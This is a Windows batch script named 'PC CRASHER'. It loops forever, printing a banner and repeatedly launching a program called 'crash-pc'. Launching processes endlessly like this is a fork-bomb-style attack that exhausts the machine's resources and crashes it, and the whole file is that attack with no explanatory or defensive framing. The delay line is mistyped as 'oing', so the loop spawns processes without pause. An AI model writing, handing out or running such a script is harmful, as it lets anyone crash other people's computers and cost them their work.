@echo off
title PC CRASHER
cd Pc-Crash
Color c
:x
echo PC CRASHER PC CRASHER PC CRASHER PC CRASHER PC CRASHER PC CRASHER PC CRASHER PC CRASHER PC CRASHER PC CRASHER PC CRASHER PC CRASHER PC CRASHER 
oing -n1 localhost>NUL
start crash-pc
goto x